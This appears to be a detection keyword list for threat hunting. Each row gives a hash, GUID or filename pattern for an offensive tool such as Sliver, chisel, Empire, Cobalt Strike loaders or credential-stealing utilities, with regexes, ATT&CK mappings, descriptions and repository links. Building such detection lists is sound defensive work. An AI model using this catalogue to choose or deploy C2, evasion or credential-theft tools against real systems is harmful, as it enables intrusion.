"*aardwolf.extensions.RDPEDYC.vchannels.socksoverrdp import SocksOverRDPChannel*",".{0,1000}aardwolf\.extensions\.RDPEDYC\.vchannels\.socksoverrdp\simport\sSocksOverRDPChannel.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*ab0198fa0310f86c57835809a96f157d2b4c3acccb3f039dba6cfb1af51f5665*",".{0,1000}ab0198fa0310f86c57835809a96f157d2b4c3acccb3f039dba6cfb1af51f5665.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ab0c5d37cd6817bde34337a51531c6db0dec64577b9c325e38627863c2d9bb97*",".{0,1000}ab0c5d37cd6817bde34337a51531c6db0dec64577b9c325e38627863c2d9bb97.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ab1b755120b2d5fb3db73f363a0b44881bc8b5e9699e27b804c9806b78de3a1b*",".{0,1000}ab1b755120b2d5fb3db73f363a0b44881bc8b5e9699e27b804c9806b78de3a1b.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","0","N/A","9","1","11","0","2024-03-22T10:29:56Z","2024-03-15T15:15:45Z" "*ab2aacb4caeafc909c788a9ca3cf03202b4f8a6f47dfa759975ac819652fbae4*",".{0,1000}ab2aacb4caeafc909c788a9ca3cf03202b4f8a6f47dfa759975ac819652fbae4.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ab2c2fad05bea1ece5e7585409c3263dcd14eab456faee47bc9f8a3b866326f1*",".{0,1000}ab2c2fad05bea1ece5e7585409c3263dcd14eab456faee47bc9f8a3b866326f1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*AB2E1440-7EC2-45A2-8CF3-2975DE8A57AD*",".{0,1000}AB2E1440\-7EC2\-45A2\-8CF3\-2975DE8A57AD.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*ab3fe5644df233ee6c10e09e60c7d8a7fa77aeb9eea8c99fd2a337f28e760258*",".{0,1000}ab3fe5644df233ee6c10e09e60c7d8a7fa77aeb9eea8c99fd2a337f28e760258.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ab495e19cd0752bcd83ae4f1ae0dff5ab09a756d63b22a64c718f87c04909142*",".{0,1000}ab495e19cd0752bcd83ae4f1ae0dff5ab09a756d63b22a64c718f87c04909142.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ab606d61d0f3791fc8e0c64507a3210299d66e3bbefbe2101c4f7d8ca64aaf8f*",".{0,1000}ab606d61d0f3791fc8e0c64507a3210299d66e3bbefbe2101c4f7d8ca64aaf8f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ab7aa0e4c923f767e50914842239578d36723656befca7bec7d40926bf79c3c3*",".{0,1000}ab7aa0e4c923f767e50914842239578d36723656befca7bec7d40926bf79c3c3.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a 
honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*ab7d1d288bd6635e9fc098fb1a1b0dee7956ddd5b61b3a8444f0e8c8198e598a*",".{0,1000}ab7d1d288bd6635e9fc098fb1a1b0dee7956ddd5b61b3a8444f0e8c8198e598a.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*ab816e6fa86f08ce0cadd09aa19335b5304f75a55f8fecfe917583650a12fe2c*",".{0,1000}ab816e6fa86f08ce0cadd09aa19335b5304f75a55f8fecfe917583650a12fe2c.{0,1000}","offensive_tool_keyword","COM-Object-hijacking","use COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)","T1546.015","TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/COM-Object-hijacking","1","0","N/A","8","1","55","30","2017-08-04T09:19:40Z","2017-08-04T08:15:36Z" "*ab9f2bf9d733a41af5323b5cabe31812d43eef41cb6dcfea9ac47308c91428e3*",".{0,1000}ab9f2bf9d733a41af5323b5cabe31812d43eef41cb6dcfea9ac47308c91428e3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*ABC32DBD-B697-482D-A763-7BA82FE9CEA2*",".{0,1000}ABC32DBD\-B697\-482D\-A763\-7BA82FE9CEA2.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","N/A","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" 
"*abeda25578952d37a4fdf1814b55799bc99ebd54643fa7608c34750832deb425*",".{0,1000}abeda25578952d37a4fdf1814b55799bc99ebd54643fa7608c34750832deb425.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*abfd0a70ecabaaa68a9f51b548542577c3859268b352c92cb7d9fa1caf6c3168*",".{0,1000}abfd0a70ecabaaa68a9f51b548542577c3859268b352c92cb7d9fa1caf6c3168.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*abopscript.txt*",".{0,1000}abopscript\.txt.{0,1000}","offensive_tool_keyword","EQGR","Equation Group scripts and tools","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Exploitation tools","https://fdik.org/EQGRP/Linux/doc/old/etc/abopscript.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*aboul3la*",".{0,1000}aboul3la.{0,1000}","offensive_tool_keyword","Github Username","Github username of pentester known for enumeration tools","N/A","N/A","N/A","N/A","Information Gathering","https://github.com/aboul3la","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*About to download Metasploit payload *",".{0,1000}About\sto\sdownload\sMetasploit\spayload\s.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - 
T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*abpttsclient.py*",".{0,1000}abpttsclient\.py.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","1","N/A","9","8","714","157","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z" "*ABPTTSClient-log.txt*",".{0,1000}ABPTTSClient\-log\.txt.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","1","N/A","9","8","714","157","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z" "*abpttsfactory.py*",".{0,1000}abpttsfactory\.py.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","1","N/A","9","8","714","157","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z" "*AbuseGithubAPI*.cpp*",".{0,1000}AbuseGithubAPI.{0,1000}\.cpp.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","122","34","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" "*AbuseGithubAPI*.exe*",".{0,1000}AbuseGithubAPI.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","122","34","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" "*ac0a36687a87166b27a9d2f4c041e5131b3aca69ab811086591117bd7f3b7eb3*",".{0,1000}ac0a36687a87166b27a9d2f4c041e5131b3aca69ab811086591117bd7f3b7eb3.{0,1000}","offensive_tool_keyword","chisel","A 
fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*ac0b5929af1c06ef6d9655a5856c2ac6908c9f4979bd2a7c12f30562fd7f7520*",".{0,1000}ac0b5929af1c06ef6d9655a5856c2ac6908c9f4979bd2a7c12f30562fd7f7520.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ac22d31fa6c3525c62ae4c2536d27ef042d37a23a76691519bfd72671d313fef*",".{0,1000}ac22d31fa6c3525c62ae4c2536d27ef042d37a23a76691519bfd72671d313fef.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ac32a19580d4f26d045e8555fb3b9f1415a45af8cbc3a67ea8d9c49dba11cdf1*",".{0,1000}ac32a19580d4f26d045e8555fb3b9f1415a45af8cbc3a67ea8d9c49dba11cdf1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ac49d2041cd57b1efba672c3305b621ebb265380010b8951cda01c055a7e1e64*",".{0,1000}ac49d2041cd57b1efba672c3305b621ebb265380010b8951cda01c055a7e1e64.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*ac6ffecbe45068d2dad0314da15f3b193eef94fd005d24646ed246d69bbb6782*",".{0,1000}ac6ffecbe45068d2dad0314da15f3b193eef94fd005d24646ed246d69bbb6782.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ac9215db682509ab2bdcba7fe924d84dafa1d8aade87172c1c6328b2cb6c9e52*",".{0,1000}ac9215db682509ab2bdcba7fe924d84dafa1d8aade87172c1c6328b2cb6c9e52.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - 
TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*ac924e7efddd20c4d783e7a0a30d6d8925f5a077b9450a49bed32a0b0bb255fd*",".{0,1000}ac924e7efddd20c4d783e7a0a30d6d8925f5a077b9450a49bed32a0b0bb255fd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*acb2c4419a7aa4cb0b812a179bdd51d579c0cc1f193b1b8911d64b2d3ff8f450*",".{0,1000}acb2c4419a7aa4cb0b812a179bdd51d579c0cc1f193b1b8911d64b2d3ff8f450.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*acb7923ed1efb328d724977f2507a7a721a6c7cf630a3b37a9f4d7a3a2c7010c*",".{0,1000}acb7923ed1efb328d724977f2507a7a721a6c7cf630a3b37a9f4d7a3a2c7010c.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline separated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*ACBypassTest*",".{0,1000}ACBypassTest.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-FodHelperBypass.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*acc6cd307e1dd184b722a082c177639e78421f79b0e3b26fa602f1ce8392cc4f*",".{0,1000}acc6cd307e1dd184b722a082c177639e78421f79b0e3b26fa602f1ce8392cc4f.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential 
Access","https://github.com/knavesec/CredMaster","1","0","file_hash","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*acc8e858d44f1310d7c9f6d2544f7a004165279132f6433271b59b73f540dbde*",".{0,1000}acc8e858d44f1310d7c9f6d2544f7a004165279132f6433271b59b73f540dbde.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*Accenture/Spartacus*",".{0,1000}Accenture\/Spartacus.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*Access_Check -Method PSRemoting*",".{0,1000}Access_Check\s\-Method\sPSRemoting.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*AccessTokenImpersonationAccount*",".{0,1000}AccessTokenImpersonationAccount.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching 
through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Accounts with extra permissions.txt*",".{0,1000}Accounts\swith\sextra\spermissions\.txt.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*acda6b715fc3fdeed1f43c73e5467f5824093ac0*",".{0,1000}acda6b715fc3fdeed1f43c73e5467f5824093ac0.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*ACE_Get-KerberosTicketCache.ps1*",".{0,1000}ACE_Get\-KerberosTicketCache\.ps1.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*ace5f1151a4f4b7df43bfc7e45aa52d00aa4dc1642bbf1aa6f0872ffed1cd684*",".{0,1000}ace5f1151a4f4b7df43bfc7e45aa52d00aa4dc1642bbf1aa6f0872ffed1cd684.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*AceLdr.*.bin*",".{0,1000}AceLdr\..{0,1000}\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 
- T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","808","151","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" "*AceLdr.zip*",".{0,1000}AceLdr\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 